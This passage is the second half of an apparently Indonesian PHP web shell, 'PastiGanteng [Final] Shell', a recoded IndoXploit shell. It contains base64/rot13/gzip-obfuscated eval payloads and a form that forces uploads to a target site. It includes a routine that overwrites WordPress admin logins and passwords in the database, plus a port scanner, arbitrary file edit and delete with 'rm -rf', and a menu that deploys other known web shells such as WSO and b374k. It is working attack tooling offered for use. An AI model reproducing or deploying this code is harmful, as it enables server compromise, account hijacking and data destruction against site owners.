2637cms_add($link,$domain,$owner['name'],"osCommerce");
2638
2639}
2640}
2641}
2642}else{
2643echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2644echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>';
2645$content = file_get_contents($pageURL.'ganteng.tmp');
2646echo $content;
2647}
2648
2649} elseif($_GET['do'] == 'log_hunter') {
2650
2651 {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
2652
2653} elseif($_GET['do'] == 'shell_check') {
2654 eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
2655
2656} elseif($_GET['do'] == 'csrf') {
2657
2658 echo '<center>
2659<form method="post">
2660<span style="margin-right: 8px; color: #fff;">URL : </span><input type="text" name="url" style="margin: 4px auto; width: 25%; height: 27px; padding-left: 3px; padding-bottom: 2px;" placeholder="http://www.target.com/[path]/upload.php" style="margin 5px auto; padding-bottom: 5px; padding-left: 5px;" required><br>
2661<span style="color: #fff;">POST : </span><input type="text" style="width: 25%; height: 27px;" name="pf" placeholder="Filedata / files[] / qqfile / userfile / dll" required><br>
2662<input class="submit" type="submit" name="d" value="Lock!">
2663</form>';
2664
2665$url = $_POST['url'];
2666$pf = $_POST['pf'];
2667$d = $_POST['d'];
2668if($d) {
2669 echo "<form align='center' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input class='submit' type='submit' name='g' value='Upload beb'></form>";
2670}
2671
2672
2673} elseif($_GET['do'] == 'wprespw') {
2674
2675
2676echo "<center><h2><font color='lime'>WP Reset Password</font></h2><br>";
2677
2678 if(empty($_POST['pwd'])){
2679
2680echo "<FORM method='POST'>
2681<table style='width:300px;'> <tr><th colspan='2'>Connect to MySQL server</th></tr> <tr><td> Hostname</td><td>
2682<input style='width:220px;' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
2683<input style='width:220px;' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
2684<input style='width:220px;' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
2685<input style='width:220px;' type='text' name='password' value='**' /></td></tr>
2686<tr><td> User baru</td><td>
2687<input style='width:220px;' type='text' name='admin' value='admin' /></td></tr>
2688 <tr><td> Pass Baru</td><td>
2689<input style='width:80px;' type='text' name='pwd' value='123456' />
2690
2691<input style='width:100px;' type='submit' value='ubah >' name='send' /></FORM>
2692</td></tr> </table></center><br><br><br><br>
2693";
2694}else{
2695$localhost = $_POST['localhost'];
2696$database = $_POST['database'];
2697$username = $_POST['username'];
2698$password = $_POST['password'];
2699$pwd = $_POST['pwd'];
2700$admin = $_POST['admin'];
2701
2702
2703 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2704 @mysql_select_db($database) or die(mysql_error());
2705
2706$hash = crypt($pwd);
2707$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
2708$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
2709$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
2710$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
2711$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
2712$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
2713$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
2714
2715
2716if($a4s){
2717echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
2718}
2719
2720}
2721
2722
2723} elseif($_GET['do'] == 'zip_menu') {
2724
2725
2726 echo "<center><h1><font color='lime'>Zip Menu</font></h1>";
2727function rmdir_recursive($dir) {
2728 foreach(scandir($dir) as $file) {
2729 if ('.' === $file || '..' === $file) continue;
2730 if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
2731 else unlink("$dir/$file");
2732 }
2733 rmdir($dir);
2734}
2735if($_FILES["zip_file"]["name"]) {
2736 $filename = $_FILES["zip_file"]["name"];
2737 $source = $_FILES["zip_file"]["tmp_name"];
2738 $type = $_FILES["zip_file"]["type"];
2739 $name = explode(".", $filename);
2740 $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
2741 foreach($accepted_types as $mime_type) {
2742 if($mime_type == $type) {
2743 $okay = true;
2744 break;
2745 }
2746 }
2747 $continue = strtolower($name[1]) == 'zip' ? true : false;
2748 if(!$continue) {
2749 $message = "Ext bukan zip -_-";
2750 }
2751 $path = dirname(__FILE__).'/';
2752 $filenoext = basename ($filename, '.zip');
2753 $filenoext = basename ($filenoext, '.ZIP');
2754 $targetdir = $path . $filenoext;
2755 $targetzip = $path . $filename;
2756 if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
2757 mkdir($targetdir, 0777);
2758 if(move_uploaded_file($source, $targetzip)) {
2759 $zip = new ZipArchive();
2760 $x = $zip->open($targetzip);
2761 if ($x === true) {
2762 $zip->extractTo($targetdir);
2763 $zip->close();
2764
2765 unlink($targetzip);
2766 }
2767 $message = "<b>Sip lah gan :o</b>";
2768 } else {
2769 $message = "<b>Error asw >:(</b>";
2770 }
2771}
2772echo '<table style="width:100%" border="1">
2773 <tr><td><h2><center><font color="red">Upload And Unzip</font></center></h2><form enctype="multipart/form-data" method="post" action="">
2774<label>Zip File : <input type="file" name="zip_file" /></label>
2775<input type="submit" name="submit" value="Upload And Unzip" />
2776</form>';
2777if($message) echo "<p>$message</p>";
2778echo "</td><td><h2><center><font color='red'>Zip Backup</font></center></h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
2779 if($_POST['backup']){
2780 $save=$_POST['save'];
2781 function Zip($source, $destination)
2782{
2783 if (extension_loaded('zip') === true)
2784 {
2785 if (file_exists($source) === true)
2786 {
2787 $zip = new ZipArchive();
2788
2789 if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
2790 {
2791 $source = realpath($source);
2792
2793 if (is_dir($source) === true)
2794 {
2795 $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
2796
2797 foreach ($files as $file)
2798 {
2799 $file = realpath($file);
2800
2801 if (is_dir($file) === true)
2802 {
2803 $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
2804 }
2805
2806 else if (is_file($file) === true)
2807 {
2808 $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
2809 }
2810 }
2811 }
2812
2813 else if (is_file($source) === true)
2814 {
2815 $zip->addFromString(basename($source), file_get_contents($source));
2816 }
2817 }
2818
2819 return $zip->close();
2820 }
2821 }
2822
2823 return false;
2824}
2825 Zip($_POST['dir'],$save);
2826 echo "Done , Save To <b>$save</b>";
2827 }
2828 echo "</td><td><h2><center><font color='red'>Unzip Manual</font></center></h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
2829 if($_POST['extrak']){
2830 $save=$_POST['save'];
2831 $zip = new ZipArchive;
2832 $res = $zip->open($_POST['dir']);
2833 if ($res === TRUE) {
2834 $zip->extractTo($save);
2835 $zip->close();
2836 echo 'Success , Location : <b>'.$save.'</b>';
2837 } else {
2838 echo 'Gagal Mas :( Ntahlah !';
2839 }
2840 }
2841echo '</tr></table>';
2842
2843
2844} elseif($_GET['do'] == 'contact') {
2845
2846 echo "<center><div style='color: #fff; background: #333; width: 350px; height: 85px; padding-top: 25px; border: 1px #333; border-radius: 3px;'><span'> E-mail : xmall75.id@gmail.com <br> FB : facebook.com/bukanyimyam </span></div></center>";
2847
2848} elseif($_GET['do'] == 'whois') {
2849
2850 {
2851 ?>
2852 <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
2853 <?php
2854 @set_time_limit(0);
2855 @error_reporting(0);
2856 function sws_domain_info($site)
2857 {
2858 $getip = @file_get_contents("http://networktools.nl/whois/$site");
2859 flush();
2860 $ip = @findit($getip,'<pre>','</pre>');
2861 return $ip;
2862 flush();
2863 }
2864 function sws_net_info($site)
2865 {
2866 $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
2867 $ip = @findit($getip,'<pre>','</pre>');
2868 return $ip;
2869 flush();
2870 }
2871 function sws_site_ser($site)
2872 {
2873 $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
2874 $ip = @findit($getip,'<pre>','</pre>');
2875 return $ip;
2876 flush();
2877 }
2878 function sws_sup_dom($site)
2879 {
2880 $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
2881 $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
2882 return $ip;
2883 flush();
2884 }
2885 function sws_port_scan($ip)
2886 {
2887 $list_post = array('80','21','22','2082','25','53','110','443','143');
2888 foreach ($list_post as $o_port)
2889 {
2890 $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
2891 if($connect)
2892 {
2893 echo " $ip : $o_port ??? <u style=\"color: #00ff00\">Open</u> <br /><br />";
2894 flush();
2895 }
2896 }
2897 }
2898 function findit($mytext,$starttag,$endtag) {
2899 $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
2900 $posRight = @stripos($mytext,$endtag,$posLeft+1);
2901 return @substr($mytext,$posLeft,$posRight-$posLeft);
2902 flush();
2903 }
2904 echo '<br><br><center>';
2905 echo '
2906 <br />
2907 <div class="sc"><form method="post"><table class="tabnet">
2908 <tr><th colspan="5">Website Whois</th></tr>
2909 <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" value="site.com" />   <input type="submit" style="color:#00ff00;background-color:#000000" name="scan" value=">>" /></td></tr>
2910 </table></form></div>
2911 <br>
2912 <span style="font-size: 16px;">Masukin site tanpa http</span>';
2913 if(isset($_POST['scan']))
2914 {
2915 $site = @htmlentities($_POST['site']);
2916 if (empty($site)){die('<br /><br /> Not add IP .. !');}
2917 $ip_port = @gethostbyname($site);
2918 echo "
2919 <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
2920 <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
2921 <div class=\"ru\"> <br /><br /><pre>
2922 ";
2923 echo "".sws_port_scan($ip_port)." </pre></div> ";
2924 flush();
2925 echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
2926 <div class=\"ru\">
2927 <pre>".sws_domain_info($site)."</pre></div>";
2928 flush();
2929 echo "
2930 <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
2931 <div class=\"ru\">
2932 <pre>".sws_net_info($site)."</pre> </div>";
2933 flush();
2934 echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
2935 <div class=\"ru\">
2936 <pre>".sws_sup_dom($site)."</pre> </div>";
2937 flush();
2938 echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
2939 <div class=\"ru\">
2940 <pre>".sws_site_ser($site)."</pre> </div>
2941 <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
2942 flush();
2943 }
2944 echo '</center>';
2945 }
2946
2947} elseif($_GET['act'] == 'newfile') {
2948 if($_POST['new_save_file']) {
2949 $newfile = htmlspecialchars($_POST['newfile']);
2950 $fopen = fopen($newfile, "a+");
2951 if($fopen) {
2952 $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2953 } else {
2954 $act = "<font color=red>permission denied</font>";
2955 }
2956 }
2957 echo $act;
2958 echo "<form method='post'>
2959 Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2960 <input type='submit' name='new_save_file' value='Submit'>
2961 </form>";
2962} elseif($_GET['act'] == 'newfolder') {
2963 if($_POST['new_save_folder']) {
2964 $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2965 if(!mkdir($new_folder)) {
2966 $act = "<font color=red>permission denied</font>";
2967 } else {
2968 $act = "<script>window.location='?dir=".$dir."';</script>";
2969 }
2970 }
2971 echo $act;
2972 echo "<form method='post'>
2973 Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2974 <input type='submit' name='new_save_folder' value='Submit'>
2975 </form>";
2976} elseif($_GET['act'] == 'rename_dir') {
2977 if($_POST['dir_rename']) {
2978 $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2979 if($dir_rename) {
2980 $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2981 } else {
2982 $act = "<font color=red>permission denied</font>";
2983 }
2984 echo "".$act."<br>";
2985 }
2986 echo "<form method='post'>
2987 <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2988 <input type='submit' name='dir_rename' value='rename'>
2989 </form>";
2990} elseif($_GET['act'] == 'delete_dir') {
2991 if(is_dir($dir)) {
2992 if(is_writable($dir)) {
2993 @rmdir($dir);
2994 @exe("rm -rf $dir");
2995 @exe("rmdir /s /q $dir");
2996 $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2997 } else {
2998 $act = "<font color=red>could not remove ".basename($dir)."</font>";
2999 }
3000 }
3001 echo $act;
3002} elseif($_GET['act'] == 'view') {
3003 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3004 echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
3005} elseif($_GET['act'] == 'edit') {
3006 if($_POST['save']) {
3007 $save = file_put_contents($_GET['file'], $_POST['src']);
3008 if($save) {
3009 $act = "<font color=lime>Saved!</font>";
3010 } else {
3011 $act = "<font color=red>permission denied</font>";
3012 }
3013 echo "".$act."<br>";
3014 }
3015 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3016 echo "<form method='post'>
3017 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
3018 <input type='submit' value='Save' name='save' style='width: 500px;'>
3019 </form>";
3020
3021
3022} elseif($_GET['act'] == 'rename') {
3023 if($_POST['do_rename']) {
3024 $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
3025 if($rename) {
3026 $act = "<script>window.location='?dir=".$dir."';</script>";
3027 } else {
3028 $act = "<font color=red>permission denied</font>";
3029 }
3030 echo "".$act."<br>";
3031 }
3032 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3033 echo "<form method='post'>
3034 <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
3035 <input type='submit' name='do_rename' value='rename'>
3036 </form>";
3037} elseif($_GET['act'] == 'delete') {
3038 $delete = unlink($_GET['file']);
3039 if($delete) {
3040 $act = "<script>window.location='?dir=".$dir."';</script>";
3041 } else {
3042 $act = "<font color=red>permission denied</font>";
3043 }
3044 echo $act;
3045
3046} else {
3047 if(is_dir($dir) === true) {
3048 if(!is_readable($dir)) {
3049 echo "<font color=red>can't open directory. ( not readable )</font>";
3050 } else {
3051 echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
3052 <tr class="atas">
3053 <th class="th_home"><center>Name</center></th>
3054 <th class="th_home"><center>Type</center></th>
3055 <th class="th_home"><center>Size</center></th>
3056 <th class="th_home"><center>Last Modified</center></th>
3057 <th class="th_home"><center>Owner/Group</center></th>
3058 <th class="th_home"><center>Permission</center></th>
3059 <th class="th_home"><center>Action</center></th>
3060 </tr>';
3061 $scandir = scandir($dir);
3062 foreach($scandir as $dirx) {
3063 $dtype = filetype("$dir/$dirx");
3064 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
3065 if(function_exists('posix_getpwuid')) {
3066 $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
3067 $downer = $downer['name'];
3068 } else {
3069 //$downer = $uid;
3070 $downer = fileowner("$dir/$dirx");
3071 }
3072 if(function_exists('posix_getgrgid')) {
3073 $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
3074 $dgrp = $dgrp['name'];
3075 } else {
3076 $dgrp = filegroup("$dir/$dirx");
3077 }
3078 if(!is_dir("$dir/$dirx")) continue;
3079 if($dirx === '..') {
3080 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
3081 } elseif($dirx === '.') {
3082 $href = "<a href='?dir=$dir'>$dirx</a>";
3083 } else {
3084 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
3085 }
3086 if($dirx === '.' || $dirx === '..') {
3087 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
3088 } else {
3089 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
3090 }
3091 echo "<tr>";
3092 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
3093 echo "<td class='td_home'><center>$dtype</center></td>";
3094 echo "<td class='td_home'><center>-</center></th></td>";
3095 echo "<td class='td_home'><center>$dtime</center></td>";
3096 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
3097 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
3098 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
3099 echo "</tr>";
3100 }
3101 }
3102 } else {
3103 echo "<font color=red>can't open directory.</font>";
3104 }
3105 foreach($scandir as $file) {
3106 $ftype = filetype("$dir/$file");
3107 $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
3108 $size = filesize("$dir/$file")/1024;
3109 $size = round($size,3);
3110 if(function_exists('posix_getpwuid')) {
3111 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
3112 $fowner = $fowner['name'];
3113 } else {
3114 //$downer = $uid;
3115 $fowner = fileowner("$dir/$file");
3116 }
3117 if(function_exists('posix_getgrgid')) {
3118 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
3119 $fgrp = $fgrp['name'];
3120 } else {
3121 $fgrp = filegroup("$dir/$file");
3122 }
3123 if($size > 1024) {
3124 $size = round($size/1024,2). 'MB';
3125 } else {
3126 $size = $size. 'KB';
3127 }
3128 if(!is_file("$dir/$file")) continue;
3129 echo "<tr>";
3130 echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
3131 echo "<td class='td_home'><center>$ftype</center></td>";
3132 echo "<td class='td_home'><center>$size</center></td>";
3133 echo "<td class='td_home'><center>$ftime</center></td>";
3134 echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
3135 echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
3136 echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
3137 echo "</tr>";
3138 }
3139 echo "</table>";
3140 if(!is_readable($dir)) {
3141 //
3142 } else {
3143 echo "<hr color='#333'>";
3144 }
3145
3146}
3147?>
3148
3149<?php
3150
3151$tool = "http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
3152
3153echo "<hr color='#333'>";
3154echo "<br>";
3155echo "
3156<center><form>
3157<select onchange='if (this.value) window.open(this.value);'>
3158 <option selected='selected' value=''> Summon Shell </option>
3159 <option class='lightblue' value='$tool=ganteng1'>PastiGanteng V.1</option>
3160 <option class='red' value='$tool=45v17'>1945v2017</option>
3161 <option class='lightblue' value='$tool=wso251'>WSO 2.5.1</option>
3162 <option class='red' value='$tool=wso28'>WSO 2.8</option>
3163 <option class='lightblue' value='$tool=wso30'>WSO 3.0</option>
3164 <option class='red' value='$tool=injection'>1n73ction v3</option>
3165 <option class='lightblue' value='$tool=b374k'>b374k Shell</option>
3166 <option class='red' value='$tool=blackhat'>BlackHat Shell</option>
3167 <option class='lightblue' value='$tool=brudul'>Brudul Shell</option>
3168 <option class='red' value='$tool=mad2'>Madspot V.2 Shell</option>
3169 <option class='lightblue' value='$tool=idx2'>IndoXploit V.2</option>
3170 <option class='red' value='$tool=idx3'>IndoXploit V.3</option>
3171 <option class='lightblue' value='$tool=noname'>Noname Shell</option>
3172</select>
3173</form>
3174<noscript><input type='submit' value='Submit'></noscript>";
3175echo "<br><hr color='#333'>Copyright © 2017 - <font color=lime>PastiGanteng [Final] Shell</font> - IndoXploit Shell Recoded by <a href='https://xmall75.blogspot.com' target='_blank'><font color=lime>Xmall75</font></a> - <a href='https://www.facebook.com/SCyberArt/' target='_blank'><font color=lime>Security Cyber Art</font></a></center>";
3176echo "<br>";
3177?>
3178
3179</html>